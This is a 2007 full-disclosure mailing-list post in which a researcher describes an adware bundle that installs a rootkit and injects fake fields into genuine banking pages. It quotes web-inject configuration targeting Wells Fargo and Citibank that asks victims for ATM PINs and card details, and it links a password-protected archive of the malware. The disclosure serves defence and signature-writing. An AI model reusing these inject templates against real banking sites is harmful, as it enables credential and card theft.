Date: Mon, 12 Mar 2007 13:52:48 +0100
From: Thierry Zoller <Thierry@...ler.lu>
To: full-disclosure@...ts.grok.org.uk, news@...uriteam.com
Subject: Iframe-Cash/Iframe-Dollars Adware
	bundle...oooh... my ....god..

Dear list,

Whoever deals with these poeple and thinks they are a benign Adware
company (and thus spreads their bundles.

Check this :
Ignoring the fact that they basicaly  install a Rootkit, I attached a
few files I reversed, they install a DLL that does not directly KEYLOG your
banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page
asking you to enter more details (like PIN, Magic Password etc), then
capture that data and transmit it (I did no further investigation)

http://secdev.zoller.lu/system32.zip
Pass: 123

I am disgusted. They even created their own XML parser for this ...

An extract of HTML code they inject :
-------------------------------------
<inject
url="wellsfargo"
before="name=userid autocomplete='off'></DIV>"
what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin  tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV>
"
block="alt=Go"
check="pin"
quan="4"
content="d"

</inject>
------------------------------------

Attached the main files (pass 123), feel free to add this as HIPS or whatever
signatures, those interested in a complete reversal can contact me
to receive the EXE in question.

I have no more time feel free to dig deeper.

I especialy liked this :
<inject
url="citibank.com"
<TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>

Puke..

--
http://secdev.zoller.lu
Thierry Zoller